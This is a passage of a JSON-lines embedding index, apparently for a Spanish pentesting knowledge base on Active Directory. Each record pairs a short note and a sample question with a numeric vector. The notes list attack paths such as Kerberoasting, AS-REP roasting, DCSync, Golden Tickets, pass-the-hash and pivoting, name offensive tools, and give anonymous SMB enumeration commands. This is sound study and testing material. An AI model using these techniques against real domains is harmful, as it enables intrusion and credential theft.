-0.02713, 0.02871, -0.01886, -0.04933, -0.03165, 0.03191, 0.01002, -0.00466, -0.00798, 0.02712, -0.04283, -0.02545, -0.03632, -0.0629, 0.01564, -0.0236, 0.08361, -0.03071, 0.01489, -0.04735, -0.00529, -0.09326, 0.07693, -0.00532, -0.06456, -0.06305, 0.01068, -0.01393, 0.08663, 0.01042, -0.02703, -0.10816, -0.05701, 0.05091, 0.03302, 0.05237, -0.0242, -0.01951, -0.04869, 0.02855, -0.07268, 0.02617, 0.06076, 0.03157, 0.01231, -0.0454, 0.05853, 0.00351, -0.02257, 0.02263, 0.03532, 0.06419, -0.01112, -0.00802, 0.1049, 0.07753, -0.0474, -0.03629, -0.00637, 0.09655, -0.05727, -0.07675, -0.0418, -0.03099, -0.02147, -0.04994, 0.04197, -0.02964, -0.00542, 0.04581, 0.02395, -0.05785, 0.06907, -0.01896, 0.00229, 0.05368, 0.01414, 0.00693, 0.04241, 0.04596, -0.04217, -0.05016, -0.03336, 0.04853, 0.00373, 0.01133, 0.05069, -0.00644, 0.03889, 0.02545, 0.00082, 0.02884, -0.02718, 0.04345, 0.02094, -0.01587, 0.01772, -0.04717, 0.06149, 0.03704, 0.00294, 0.06015, -0.01548, 0.09436, 0.06778, -0.02516, -0.03357, -0.02734, -0.04628, -0.04046, -0.065, -0.03694, -0.03939, 0.02354, -0.03938, 0.04746, 0.02491, 0.04823, 0.03772]} +{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Los 7 caminos que SIEMPRE pruebas\n1. **Anonymous SMB** β†’ SMB (`smbclient -L //IP -N`, `nxc smb IP -u \"\" -p \"\"`)\n2. **AS-REP Roasting** β†’ AS-REP Roasting\n3. **Kerberoasting** β†’ Kerberoasting\n4. **GPP cpassword** β†’ GPP cpassword\n5. **LAPS** β†’ LAPS\n6. **ACL abuses** β†’ ACL abuses (te los pinta BloodHound)\n7. **DCSync** β†’ DCSync", "indexar": "como puedo rolear credenciales Kerberos o hacer AS-REP roasting?", "v": [-0.03541, -0.17123, 0.05157, -0.02393, 0.14094, -0.012, 0.1446, 0.14007, -0.0321, -0.0651, -0.18184, 0.00817, 0.04538, -0.10693, 0.34438, 0.04071, -0.18154, 0.25634, 0.01606, 0.14365, 0.02548, -0.09857, -0.13787, 0.10529, 0.17803, 0.13321, 0.056, -0.03279, 0.09229, 0.05287, -0.03883, 0.03232, -0.0391, 0.00285, -0.14423, 0.06615, -0.12911, 0.0593, -0.01199, 0.1264, -0.06939, 0.08325, -0.00534, 0.08771, 0.01546, 0.0675, -0.06215, -0.08141, -0.04642, 0.02648, 0.05743, -0.07253, 0.01673, -0.03341, 0.07065, 0.06496, 0.07068, -0.12635, -0.04839, -0.02242, 0.02284, -0.02571, 0.00171, 0.00125, 0.02396, -0.09636, -0.04218, -0.06358, 0.0313, -0.04583, -0.1261, 0.00524, 0.0487, -0.00813, 0.02427, -0.03119, 0.01612, -0.00483, 0.01577, -0.01457, 0.00451, -0.07724, 0.03247, 0.1058, 0.0993, -0.05133, 0.02543, -0.04411, 0.01543, -0.04408, 0.08416, 0.00185, 0.01113, 0.04708, 0.05197, -0.05648, -0.09753, 0.04877, -0.07266, -0.02573, -0.0482, -0.06191, -0.019, 0.01897, -0.03596, 0.02583, 0.05369, -0.00627, 0.07968, -0.05603, 0.01223, 0.0315, -0.11138, -0.04387, 0.00965, 0.0886, -0.01766, -0.0149, 0.05608, 0.039, -0.00082, -0.04254, 0.04878, 0.05407, 0.01716, 0.03686, -0.00109, 0.0712, -0.03349, -0.03961, -0.01825, 0.04949, -0.01768, 0.03633, 0.05291, -0.06564, -0.03157, -0.03624, -0.07733, -0.04365, -0.01379, 0.03202, 0.01686, -0.03705, -0.07215, 0.02256, 0.0183, -0.0399, 0.05907, -0.07778, 0.01202, 0.07513, -0.05608, 0.01151, 0.02928, -0.03387, -0.01167, -0.02294, 0.05541, 0.02899, -0.05679, -0.07131, 0.01788, -0.01094, 0.05016, 0.04574, -0.00348, 0.02502, 0.08245, 0.02903, -0.03132, 0.00294, 0.02077, -0.03966, 0.07788, 0.02117, 0.05592, 0.02287, -0.03507, 0.01908, 0.04412, -0.01521, 0.05886, 0.0648, 0.01001, 0.03783, 0.01573, -0.03211, -0.03828, -0.00462, 0.04355, -0.02908, 0.05937, 0.00475, -0.01512, 0.01426, 0.04924, 0.03225, -0.04803, 0.03589, -0.03305, 0.03282, -0.00842, -0.03177, -0.00722, 0.01077, 0.00013, 0.05687, -0.00138, 0.04229, 0.02981, -0.05249, 0.07458, -0.0306, 0.00276, 0.01931, 0.03446, -0.01991, -0.06426, 0.01102, 0.09972, -0.00502, 0.03739, 0.0116, 0.01443, 0.03186, 0.02891, -0.00047, -0.06933, -0.00913, 0.02858, 0.02923, -0.00416, 0.00424, -0.0002, 0.00029, -0.05209, -0.00621, -0.0148, 0.04579, -0.03635, -0.05624, -0.01294, 0.01182, 0.02203, 0.00292, -0.03221, 0.02722, 0.02855, -0.00485, -0.03741, -0.03825, -0.04013, 0.00026, 0.01496, -0.0487]} +{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Conceptos\n- Kerberos (TGT/TGS) Β· Pass-the-Hash Β· Golden Ticket Β· Silver Ticket\n- Crackear los tickets β†’ Cracking de contraseΓ±as\n- Entrar a la red interna β†’ Pivoting ligolo-ng / Tunneling", "indexar": "quΓ© herramienta sirve para generar un Golden Ticket?", "v": [-0.12309, -0.03195, -0.06341, -0.11904, -0.02455, -0.04513, -0.11576, -0.00941, 0.08399, -0.09202, -0.07962, 0.02278, -0.05987, 0.02477, 0.08145, 0.07191, 0.07025, -0.1661, 0.03914, 0.06736, -0.01822, 0.11755, 0.04505, -0.26049, -0.03542, -0.07265, 0.11945, -0.05557, -0.12632, 0.12927, 0.10472, -0.11018, -0.07642, -0.18474, -0.1433, -0.11987, -0.00958, 0.12231, -0.01814, -0.00523, 0.00462, 0.04856, -0.01121, 0.05457, 0.07521, -0.0409, 0.04555, 0.10475, -0.09616, 0.07784, -0.0249, -0.09739, -0.06512, -0.02444, 0.03203, -0.08124, 0.05149, -0.17185, -0.05882, -0.03121, -0.12583, -0.11373, -0.06945, -0.01741, -0.1147, 0.08224, 0.00683, -0.01267, 0.00557, 0.01299, -0.09171, 0.04007, 0.08604, 0.05048, 0.05632, -0.03649, 0.05934, 0.05097, -0.0067, 0.059, 0.10095, 0.01785, -0.04537, 0.01402, 0.03884, -0.05326, 0.12649, -0.05469, -0.04586, -0.05984, -0.07582, 0.0308, 0.0527, 0.00475, -0.00036, -0.06886, -0.01083, -0.10374, -0.05291, 0.05284, 0.13489, -0.1167, -0.05444, 0.02523, -0.04128, 0.05687, -0.01203, -0.04313, -0.1037, -0.00369, -0.02516, 0.04411, -0.05831, 0.02255, -0.00179, 0.07792, 0.05517, -0.02683, 0.05526, -0.03232, 0.09943, 0.03712, -0.08608, -0.04987, -0.0246, 0.0426, -0.01959, 0.01823, 0.03191, -0.04947, -0.04711, -0.00471, -0.03714, 0.03077, -0.01067, -0.03629, 0.02429, -0.14159, 0.04213, 0.01361, 0.04893, 0.00072, -0.01547, -0.09497, 0.00114, -0.0633, 0.03335, -0.01869, -0.01918, -0.02017, 0.01761, -0.11745, -0.04296, 0.07327, -0.08957, 0.01479, -0.05795, 0.0004, -0.11644, 0.02414, -0.05668, -0.02977, 0.00327, 0.02894, 0.01493, -0.00298, -0.02079, 0.03884, 0.024, 0.07348, 0.06955, -0.00693, 0.08863, -0.03841, -0.0273, -0.08422, -0.07671, -0.028, 0.03116, -0.08562, 0.05523, -0.02068, -0.03676, 0.03156, -0.02881, -0.01308, 0.03239, -0.05079, 0.04024, 0.06128, -0.03104, 0.01441, 0.03813, -0.03436, 0.02319, -0.05928, -0.0047, -0.08694, 0.05424, -0.04239, -0.02638, -0.01398, -0.02238, 0.01904, 0.09731, 0.04976, -0.02305, -0.02585, -0.0137, 0.0815, 0.01349, -0.00044, 0.07569, -0.01842, 0.01486, -0.02409, -0.00034, 0.01488, -0.03086, 0.00244, 0.08463, -0.01932, 0.02118, -0.01869, -0.00801, 0.04188, 0.02085, 0.00239, 0.04407, 0.01807, 0.06791, -0.02217, -0.0274, 0.05821, 0.04485, -0.0493, 0.05487, -0.02835, -0.06581, -0.0012, -0.00538, 0.05093, -0.01362, 0.01479, 0.01152, -0.0161, 0.02265, 0.01673, 0.01981, -0.05521, -0.04173, -0.0024, 0.02696, -0.03505, 0.00932, -0.01701]} +{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Conceptos\n- Kerberos (TGT/TGS) Β· Pass-the-Hash Β· Golden Ticket Β· Silver Ticket\n- Crackear los tickets β†’ Cracking de contraseΓ±as\n- Entrar a la red interna β†’ Pivoting ligolo-ng / Tunneling", "indexar": "con quΓ© puedo hacer el pivoteo hacia la red interna?", "v": [-0.09355, 0.06135, -0.1962, 0.10496, 0.1942, -0.04406, 0.06871, -0.06776, -0.11261, -0.19537, 0.06114, 0.01862, 0.09847, -0.07135, 0.08844, 0.0272, 0.01236, 0.15119, 0.07787, -0.15149, -0.12802, -0.07975, -0.03724, 0.016, 0.07892, 0.1726, 0.07475, 0.20804, -0.09922, 0.07711, -0.05358, 0.08908, 0.07425, -0.0596, -0.05592, 0.04669, 0.12191, 0.17084, 0.04448, 0.05766, -0.12266, 0.06749, -0.05315, 0.00978, 0.14163, -0.09603, -0.0419, -0.04968, -0.01174, 0.02404, -0.03882, -0.02693, -0.0321, -0.16579, 0.0115, -0.04265, 0.10255, -0.09756, -0.00856, -0.13634, -0.02009, 0.04469, 0.04022, 0.0738, -0.05598, -0.06263, -0.0501, -0.01418, 0.05587, 0.06451, -0.03123, 0.03891, -0.02137, 0.06128, 0.07643, 0.06277, -0.03681, 0.02913, 0.07529, 0.02125, -0.04644, 0.14665, -0.03813, -0.04723, 0.03347, -0.09762, -0.00729, 0.02244, -0.02818, -0.11899, 0.08507, -0.03435, 0.07307, -0.02216, 0.00022, 0.0062, -0.11977, 0.07335, -0.01394, -0.09115, -0.00272, 0.02408, -0.10221, 0.01707, 0.06975, 0.03541, 0.0026, -0.00946, 0.05541, 0.05725, 0.01657, 0.00368, -0.03297, -0.0513, 0.05967, -0.00026, -0.04699, 0.00485, -0.00971, -0.01298, 0.02894, -0.05184, -0.01652, -0.05587, -0.05209, -0.01986, -0.0468, 0.04865, 0.04751, 0.0273, -0.03672, -0.01129, 0.00551, -0.04971, -0.07347, -0.01888, 0.04408, -0.02911, 0.04479, -0.00202, 0.04219, -0.00069, 0.00883, -0.04869, -0.03663, 0.05169, 0.04746, -0.10261, -0.05478, 0.0279, -0.01476, 0.03367, -0.03915, 0.02582, -0.02095, -0.00946, -0.01173, -0.02685, 0.02673, 0.09593, -0.00552, 0.00851, -0.00192, 0.02408, 0.02297, -0.03256, -0.02877, -0.03369, 0.03903, -0.05832, -0.03535, 0.10491, -0.0766, -0.03163, -0.00809, -0.07492, -0.0492, -0.04574, -0.01058, -0.05532, 0.05423, 0.02271, -0.04034, -0.03838, -0.0054, -0.00547, 0.01559, -0.03997, 0.05758, -0.04374, -0.02487, 0.03305, 0.0499, -0.01612, 0.03195, -0.00073, 0.017, 0.02565, 0.03977, -0.00968, -0.03258, 0.02383, -0.00977, -0.04184, 0.00325, 0.00699, -0.08528, 0.08587, 0.02895, 0.07755, 0.05137, -0.00759, 0.08656, -0.00783, -0.07323, 0.01804, -0.0075, 0.00036, -0.00167, 0.0166, 0.11986, 0.02039, 0.02914, -0.01785, -0.00671, 0.05294, 0.02692, -0.04001, -0.01332, 0.09241, 0.04098, -0.00587, -0.00279, -0.02807, 0.02654, -0.01579, 0.04461, 0.04572, -0.01404, -0.04405, 0.07843, 0.02586, -0.05547, -0.00295, 0.04713, -0.00726, -0.05054, 0.04078, 0.02009, -0.0754, -0.03752, 0.05746, 0.01882, -0.033, 0.07052, 0.00179]} +{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Conceptos\n- Kerberos (TGT/TGS) Β· Pass-the-Hash Β· Golden Ticket Β· Silver Ticket\n- Crackear los tickets β†’ Cracking de contraseΓ±as\n- Entrar a la red interna β†’ Pivoting ligolo-ng / Tunneling", "indexar": "cΓ³mo crackeo los tickets Kerberos paso a paso?", "v": [-0.17562, -0.15132, -0.11002, -0.02484, -0.09792, -0.2033, 0.13097, 0.1738, 0.01903, -0.06169, -0.10347, 0.00196, -0.04846, -0.06768, 0.176, -0.04279, -0.06739, 0.16033, 0.20409, 0.03813, -0.04994, 0.04892, -0.00079, 0.01857, -0.00687, 0.0013, -0.06098, -0.01477, -0.15125, 0.00202, -0.02871, 0.05554, 0.03317, -0.09349, 0.06179, -0.06542, 0.01907, 0.04695, 0.06487, 0.10947, -0.04967, -0.05488, 0.08112, 0.03912, -0.02835, -0.10777, -0.03965, 0.10365, 0.01877, -0.09565, 0.06538, -0.01727, -0.06126, 0.05025, -0.03506, -0.1034, 0.10924, 0.003, -0.08574, 0.05358, -0.04556, -0.01284, -0.0195, 0.07736, -0.09985, -0.1119, 0.03879, -0.04173, 0.04163, -0.0325, -0.07641, 0.068, 0.11156, 0.07287, 0.03014, 0.10157, 0.08627, -0.00832, 0.0443, 0.09007, 0.02594, 0.06039, 0.0616, 0.01412, -0.11725, 0.05318, 0.07942, 0.03574, 0.03168, 0.05953, -0.04055, 0.06328, 0.09767, 0.03186, 0.02413, -0.08828, -0.08138, -0.02122, -0.08571, 0.02596, -0.09277, -0.10189, -0.0792, 0.03479, -0.04861, 0.06583, 0.01296, -0.03359, -0.03683, -0.02446, 0.03354, 0.1048, -0.00316, -0.02555, 0.01966, 0.04984, 0.03701, -0.05622, 0.00362, 0.04708, -0.04636, 0.02945, -0.02587, -0.15796, -0.03197, 0.01666, 0.03657, 0.09874, -0.00674, -0.11839, 0.00246, -0.02616, -0.06975, 0.07639, -0.05048, -0.01817, 0.03849, -0.00351, -0.04221, 0.01099, -0.00701, 0.09201, -0.02746, 0.05964, 0.04075, -0.01965, -0.05482, 0.03904, -0.01269, 0.01966, 0.00377, 0.0424, -0.04226, 0.07138, -0.02661, 0.01292, 0.01406, -0.06652, 0.01674, 0.01363, -0.04381, 0.00965, -0.00297, 0.07463, 0.00628, 0.02201, -0.00609, -0.02052, 0.01419, 0.01932, -0.03767, 0.06555, 0.03191, 0.04151, 0.00493, -0.04213, 0.0646, -0.01282, -0.01157, -0.04638, 0.09811, -0.03749, 0.02477, 0.02695, -0.0521, -0.02863, 0.04338, -0.05018, 0.01292, 0.0587, 0.04641, -0.02051, -0.019, 0.01188, -0.00145, -0.02855, -0.05987, -0.00976, -0.03118, -0.01139, -0.08588, -0.03305, 0.0686, -0.02628, 0.05269, 0.02523, 0.02471, -0.02011, -0.04675, 0.08507, 0.07991, -0.09354, 0.03584, -0.03547, -0.05547, -0.00616, 0.01709, -0.04595, -0.04812, 0.01423, 0.05621, 0.07339, 0.08206, -0.05476, 0.04065, -0.04802, 0.04625, 0.01022, 0.03696, 0.09661, -0.01156, 0.04748, 0.04348, 0.00083, 0.02851, 0.02547, -0.00377, 0.01105, -0.06996, -0.02322, 0.07839, 0.08978, 0.0674, 0.0327, -0.04192, -0.01409, -0.0925, 0.01889, 0.04511, -0.00138, 0.01686, -0.02854, 0.00039, 0.04566, 0.00365, -0.10167]} +{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Herramientas\nNetExec/CrackMapExec, BloodHound, Rubeus, Kerbrute, Responder, Evil-WinRM, Impacket β†’ Herramientas (Γ­ndice).\n\nRelacionado: OSCP MOC", "indexar": "quΓ© herramientas de penetraciΓ³n en red existen para auditar dominios de trabajo?", "v": [0.12662, -0.02864, -0.09136, -0.1839, 0.11286, -0.01866, -0.00317, -0.02102, -0.07702, 0.09225, -0.14109, -0.1266, -0.12014, -0.10597, 0.0662, -0.0298, 0.14055, -0.09139, -0.06256, -0.05607, -0.01793, -0.0374, -0.05134, 0.08195, -0.03669, -0.00205, 0.049, -0.07967, -0.01401, 0.20681, 0.02231, -0.00957, 0.04869, -0.00765, -0.11605, -0.10623, -0.03548, 0.12612, 0.06743, 0.16965, 0.01086, 0.03128, -0.095, 0.0721, 0.04035, -0.08734, -0.02507, -0.03241, -0.04536, 0.04665, -0.07571, 0.00396, -0.13022, -0.09049, 0.01633, -0.10492, 0.13903, -0.03823, -0.00319, -0.08795, -0.15268, 0.0324, -0.07494, 0.02148, -0.00465, -0.04251, 0.01006, -0.01172, 0.02349, 0.17404, -0.00682, 0.02287, -0.05691, -0.03026, 0.02486, -0.08612, 0.00823, -0.01922, -0.00994, -0.05845, 0.0708, 0.0632, -0.03158, 0.01704, -0.09778, -0.15061, -0.05194, -0.07358, -0.06075, -0.09407, -0.00236, 0.0393, -0.02015, -0.07643, -0.02318, 0.04545, 0.07652, -0.08771, -0.09326, -0.04576, 0.03749, 0.09022, -0.1033, 0.03239, 0.08323, 0.15733, -0.00768, 0.01306, 0.03504, -0.04554, -0.01159, -0.0202, -0.08331, -0.11535, -0.0659, 0.0345, -0.06959, -0.0249, -0.01717, -0.09709, -0.00961, 0.03229, -0.0545, 0.05291, -0.0688, -0.18124, 0.05685, -0.04068, -0.00855, -0.10401, 0.07309, -0.01061, -0.08977, -0.01365, 0.01847, 0.01126, 0.00704, -0.0642, -0.0553, -0.06122, -0.06166, 0.03472, -0.0607, -0.05542, -0.00283, 0.11997, 0.03555, -0.05747, -0.07871, -0.04628, -0.10397, -0.05631, -0.08792, 0.03792, 0.02421, 0.04466, -0.0137, 0.00651, -0.06522, 0.0348, 0.02212, -0.06377, -0.00282, 0.01169, -0.00675, 0.04049, 0.03098, -0.00907, 0.03881, -0.01501, -0.02242, 0.06263, -0.0111, -0.05294, 0.02645, -0.05046, -0.03956, -0.03887, 0.02958, -0.04088, 0.02151, -0.008, -0.04597, -0.0183, 0.02542, 0.04442, 0.04857, -0.03427, -0.02127, 0.09523, 0.06071, -0.05514, -0.00414, -0.00127, 0.05992, 0.00676, 0.0148, -0.03748, -0.10146, -0.01549, 0.00331, -0.0595, -0.00333, -0.04534, 0.04313, 0.0215, 0.00959, 0.00963, -0.02437, -0.00168, 0.01774, -0.00076, -0.01474, -0.06671, -0.04254, 0.01762, 0.0441, 0.03569, -0.05876, -0.04323, 0.05164, -0.00606, 0.03785, -0.06109, 0.00565, 0.04169, 0.00317, -0.01718, 0.0407, 0.02936, 0.04009, -0.04115, -0.03677, -0.03248, -0.0317, -0.04473, 0.00481, 0.0541, 0.012, 0.0308, -0.02874, 0.01103, -0.01821, -0.00112, -0.03904, -0.05417, -0.0244, -0.02131, -0.06911, -0.03159, 0.0071, 0.04059, -0.02203, -0.05445, 0.02077, -0.03476]} +{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Herramientas\nNetExec/CrackMapExec, BloodHound, Rubeus, Kerbrute, Responder, Evil-WinRM, Impacket β†’ Herramientas (Γ­ndice).\n\nRelacionado: OSCP MOC", "indexar": "con quΓ© programas puedo realizar ataques de fuerza bruta contra cuentas de dominio?", "v": [0.0212, 0.03937, -0.15134, -0.08966, -0.03717, 0.04949, 0.20544, 0.02745, -0.15871, -0.02419, -0.03023, -0.01376, -0.03597, -0.023, -0.00011, -0.08182, 0.1268, -0.04972, -0.01947, -0.11884, 0.00862, -0.21352, 0.10499, -0.04723, -0.06707, -0.06537, 0.00518, 0.08617, -0.04537, 0.03261, 0.04391, 0.03468, 0.12946, -0.04168, 0.08174, 0.01452, -0.04428, 0.09787, 0.20748, 0.08589, 0.02867, 0.03132, -0.15305, -0.02519, 0.01216, -0.0174, -0.02968, 0.02374, 0.01468, -0.10267, -0.03023, -0.02229, -0.16712, -0.02484, -0.10249, -0.14033, -0.01282, -0.10716, -0.06477, 0.00617, -0.09488, 0.03927, 0.05805, 0.00324, -0.02124, -0.04829, 0.00228, 0.02266, -0.02224, 0.04504, -0.11543, -0.02801, -0.04024, 0.00841, -0.00608, -0.05876, 0.06028, -0.02115, -0.03015, -0.06473, -0.08763, 0.00352, -0.14252, 0.03235, -0.11523, -0.08465, -0.05514, -0.11531, -0.00936, -0.06109, 0.05174, -0.04099, -0.0848, 0.02112, -0.06973, 0.05175, 0.0105, -0.01671, -0.04456, -0.05353, -0.01694, 0.00721, -0.13065, -0.00218, 0.08608, 0.09432, -0.02466, -0.06144, 0.00141, 0.00572, -0.05855, -0.08274, -0.11318, -0.00905, -0.03136, 0.03047, -0.1585, -0.03242, 0.07365, -0.01372, -0.11548, -0.01744, -0.01497, 0.11271, -0.01665, 0.00152, 0.04006, 0.03109, -0.04142, -0.13011, 0.0092, -0.01925, 0.07766, -0.03729, -0.00108, 0.02293, -0.02031, -0.08109, 0.01011, -0.05697, 0.00385, 0.08108, -0.00937, -0.04622, 0.03436, 0.00457, -0.0013, -0.08725, -0.08222, 0.03025, 0.07581, -0.04543, -0.00737, 0.10298, -0.08288, 0.02047, -0.0071, -0.03583, -0.06294, 0.06441, -0.0717, 0.01358, -0.12731, 0.01434, 0.02933, -0.01977, -0.05162, 0.03418, 0.06503, 0.05488, -0.04788, 0.09325, 0.06886, -0.00539, 0.00862, -0.06599, -0.01842, -0.02863, -0.02785, -0.02663, -0.08588, -0.04587, 0.02309, 0.01547, -0.0321, 0.01932, 0.05514, 0.00056, 0.05029, 0.01302, 0.00935, 0.06275, -0.0672, 0.03175, -0.01223, -0.04641, -0.06054, 0.02661, 0.0057, -0.00714, -0.00709, -0.03647, -0.04166, 0.00291, 0.02798, 0.09204, -0.00968, -0.01053, -0.007, 0.00815, 0.0208, -0.04526, 0.05067, -0.08512, -0.0853, -0.01742, -0.00161, -0.00129, 0.02592, 0.00683, -0.05791, 0.03317, 0.01634, -0.00418, 0.02435, -0.02442, 0.02042, -0.10342, 0.055, 0.06357, -0.02496, -0.048, -0.02102, -0.0141, -0.012, 0.00337, 0.05406, -0.00207, -0.02378, 0.03973, -0.05706, 0.05923, 0.04287, -0.10188, -0.08888, -0.02806, -0.09717, 0.00566, -0.03978, -0.01909, 0.01742, 0.06771, 0.04967, 0.0157, 0.00273, 0.00912]} +{"tipo": "pregunta", "herramienta": "Active Directory", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Herramientas\nNetExec/CrackMapExec, BloodHound, Rubeus, Kerbrute, Responder, Evil-WinRM, Impacket β†’ Herramientas (Γ­ndice).\n\nRelacionado: OSCP MOC", "indexar": "cuΓ‘les son las mejores opciones libres o de cΓ³digo abierto para mapear infraestructuras Active Directory?", "v": [0.18979, -0.00718, 0.04506, -0.05386, -0.00013, -0.19425, 0.02218, -0.00538, -0.23019, -0.09297, -0.03043, -0.23095, 0.01302, -0.1175, 0.10805, -0.01265, 0.10681, -0.09845, 0.00634, -0.04452, -0.05967, 0.05952, -0.15577, 0.01986, -0.05052, -0.03302, 0.02936, -0.04318, -0.18479, -0.09378, 0.04425, 0.05743, 0.07129, 0.0033, -0.02182, -0.03591, 0.04994, 0.07287, -0.00603, -0.02367, -0.10477, -0.02318, -0.05845, 0.06135, 0.11851, 0.03056, -0.07671, 0.05901, 0.05491, -0.06989, -0.05547, -0.06674, 0.02147, -0.05305, 0.09029, 0.0149, 0.02623, -0.02265, -0.05721, -0.04486, -0.00076, -0.05467, 0.01439, -0.10479, -0.0151, -0.07127, 0.10336, 0.03887, -0.11032, 0.09925, 0.02466, 0.04219, -0.01093, 0.15007, 0.03515, 0.12274, -0.02283, -0.09709, -0.08121, 0.17964, 0.15749, 0.01758, -0.03789, 0.00119, -0.02697, 0.01346, -0.00561, -0.0989, -0.00831, -0.05122, 0.0873, 0.07279, -0.02237, 0.16548, -0.03012, 0.00095, -0.00104, 0.12666, 0.07672, 0.0557, 0.01961, 0.0176, 0.00747, 0.06012, 0.08763, 0.06945, 0.02495, 0.01401, -0.08479, 0.02002, -0.025, 0.01414, -0.0241, -0.05341, -0.02811, 0.01689, -0.09872, -0.04567, 0.00062, -0.00549, -0.06463, -0.01815, -0.05082, 0.03653, 0.00588, 0.10268, 0.05795, 0.05456, 0.02015, 0.04051, -0.02004, 0.02143, -0.02149, -0.04641, -0.05654, -0.00589, 0.04347, 0.00461, 0.00194, 0.01941, -0.07582, -0.04012, 0.05962, 0.04126, -0.02185, 0.03024, 0.04203, -0.0137, -0.04669, -0.03902, 0.00446, 0.06554, -0.01883, -0.00646, 0.0082, 0.11693, -0.00756, -0.04101, -0.06491, 0.09073, -0.01121, 0.03554, -0.10944, 0.02163, 0.03838, -0.00111, -0.05922, 0.03605, 0.00804, 0.0268, 0.01598, 0.11153, 0.06315, -0.12793, -0.05137, -0.0676, -0.00592, -0.00216, -0.00867, -0.01831, -0.03423, -0.02024, -0.02516, 0.01153, -0.03114, 0.00698, 0.04372, -0.01465, 0.01108, -0.00941, -0.00718, 0.04012, 0.04132, 0.01903, 0.02177, -0.07907, 0.05458, -0.02988, -0.09193, -0.05719, -0.1055, 0.01105, -0.01111, -0.07467, 0.01054, 0.11191, 0.00551, 0.03781, 0.03353, 0.04378, -0.01449, -0.03868, 0.11968, -0.01537, -0.05833, 0.01462, 0.00758, 0.01102, 0.0396, -0.00353, 0.00413, -0.02966, -0.04599, -0.06521, 0.02991, 0.00433, -0.02517, -0.02715, 0.02046, -0.00149, 0.03562, 0.00707, -0.02781, -0.00148, 0.00669, 0.01801, -0.00474, -0.01824, -0.00449, -0.03995, 0.08418, 0.0901, -0.02634, -0.04193, -0.03836, -0.02273, -0.01077, -0.01203, -0.01966, -0.06784, -0.04425, -0.00042, 0.02475, -0.02525, -0.01794, -0.06398]} +{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# ACL abuses\n\n> Permisos mal configurados sobre objetos de AD que te dejan escalar. **BloodHound te los pinta** como aristas. Camino de Active Directory.", "indexar": "que herramienta sirve para visualizar las rutas de escalada en Active Directory", "v": [0.1498, 0.02798, -0.24493, -0.21927, 0.06131, -0.088, -0.12202, -0.03661, 0.05125, -0.03009, 0.07062, -0.21732, -0.05007, -0.06428, 0.14733, -0.04958, 0.04281, -0.05504, -0.02146, -0.01822, 0.00184, -0.0087, -0.04271, 0.07437, -0.02979, 0.03298, 0.01739, 0.01004, -0.05439, -0.05003, 0.07711, 0.13123, -0.01678, -0.0832, 0.02881, -0.15047, -0.03361, -0.02895, 0.02575, -0.07349, -0.16089, 0.11167, -0.09274, -0.05966, 0.04982, 0.05449, -0.02401, -0.03725, -0.02659, 0.12693, -0.02765, -0.14177, -0.05565, -0.09417, 0.08664, -0.05847, 0.13072, -0.05913, -0.02524, -0.14775, -0.04898, -0.05124, -0.04548, -0.05656, -0.09023, -0.08013, 0.06335, -0.09696, -0.10508, 0.00986, -0.08103, -0.01246, 0.09107, 0.09344, -0.03556, -0.04462, 0.04044, 0.03917, -0.01914, 0.08371, 0.14613, -0.01271, -0.06662, 0.06282, -0.12948, -0.14733, 0.08384, -0.0472, 0.08854, 0.0039, -0.00324, 0.06744, -0.02367, 0.00903, 0.01565, 0.05191, 0.07987, -0.0165, 0.06969, 0.02386, 0.01941, -0.09518, -0.02259, 0.07449, 0.00147, 0.06577, -0.06174, 0.03964, -0.13201, 0.07487, 0.09596, -0.00329, -0.00242, -0.02978, -0.03092, 0.07341, -0.08389, -0.13004, -0.03797, -0.04122, -0.00632, 0.00696, -0.03101, 0.02923, -0.01748, 0.01656, -0.08656, 0.07614, -0.01131, -0.03018, 0.01269, 0.01905, -0.00251, 0.00014, -0.02818, -0.06772, 0.01696, -0.04947, 0.06731, -0.10636, 0.03904, 0.03232, -0.04744, -0.07057, 0.028, 0.02264, -0.00185, -0.03337, -0.02315, 0.02649, 0.00143, -0.00439, -0.00075, 0.09118, 0.08251, 0.00426, -0.02439, 0.00252, -0.10206, 0.12734, -0.0234, -0.01086, 0.02463, -0.01102, 0.01941, -0.05825, -0.01726, -0.00678, 0.02894, 0.00875, 0.01621, 0.04974, 0.04984, -0.05484, 0.01641, -0.05337, -0.05856, -0.00823, 0.06264, 0.00077, -0.03155, 0.00662, -0.02178, -0.02851, -0.01214, -0.0476, 0.04202, -0.06884, -0.00898, 0.03354, -0.03273, 0.02481, 0.00013, -0.0772, 0.00075, -0.06296, 0.03195, 0.00911, 0.02202, -0.04115, 0.01612, -0.00783, -0.011, -0.05855, 0.03886, 0.00726, -0.02252, 0.03246, 0.05511, 0.06082, 0.00483, -0.00317, 0.03604, 0.01288, -0.01321, -0.02371, 0.03644, 0.06027, -0.04893, 0.01426, -0.03436, 0.04474, 0.03933, -0.02047, 0.01604, 0.027, -0.01501, -0.03864, -0.01515, 0.00988, 0.01312, -0.02841, -0.01467, 0.01571, 0.03481, -0.03575, 0.06218, 0.01596, -0.04665, -0.03092, -0.02866, 0.06445, 0.03383, 0.02392, -0.10912, -0.02943, 0.03355, 0.03746, 0.00588, -0.08356, -0.02119, -0.01847, 